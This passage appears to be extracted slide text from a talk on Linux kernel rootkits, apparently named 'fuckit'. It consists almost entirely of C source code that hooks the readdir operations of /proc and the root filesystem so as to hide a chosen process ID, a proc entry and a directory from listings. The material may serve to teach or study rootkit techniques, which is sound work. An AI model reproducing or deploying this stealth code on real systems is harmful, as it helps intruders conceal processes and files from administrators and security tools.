66. “Hook” the Virtual Filesystem (/proc) static struct file_operations *proc_fops; remember again? void hook_proc(void){ /* we are not /proc yet */ key = create_proc_entry(KEY,0666,NULL); /* now we become /proc :) */ proc = key->parent; /* save the original, we will need it later*/ proc_fops = (struct file_operations *)proc->proc_fops; original_proc_readdir = proc_fops->readdir; /* tha hook */ proc_fops->readdir = fuckit_proc_readdir; } 14
67. “Hook” the Virtual Filesystem (/) static struct file *f; int hook_root(void){ f = filp_open("/",O_RDONLY,0600); if(IS_ERR(f)){ return -1; } original_root_readdir = f->f_op->readdir; f->f_op->readdir=fuckit_root_readdir; filp_close(f,NULL); return 0; } 15
68. Process hiding static inline int fuckit_proc_filldir(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type){ //our hidden PID :) if(!strcmp(name,HIDDEN_PID) || !strcmp(name,KEY)){ return 0; } return original_filldir(__buf,name,namelen,offset,ino,d_type); } static inline int fuckit_proc_readdir(struct file *filp, void *dirent, filldir_t filldir){ //save this, we will need to return it later original_filldir = filldir; return original_proc_readdir(filp,dirent,fuckit_proc_filldir); } 16
69. File and Directory hiding static int fuckit_root_filldir(void *__buf, const char *name, int namelen, loff_t offset, u64 ino, unsigned d_type){ //if is our hidden file/directory return nothing! :) if(strncmp(name,HIDDEN_DIR,namelen)==0){ return 0; } return original_root_filldir(__buf,name,namelen,offset,ino,d_type); } static int fuckit_root_readdir(struct file *filp, void *dirent, filldir_t filldir){ //save this, we will need to return it later original_root_filldir = filldir; return original_root_readdir(filp,dirent,fuckit_root_filldir); } 17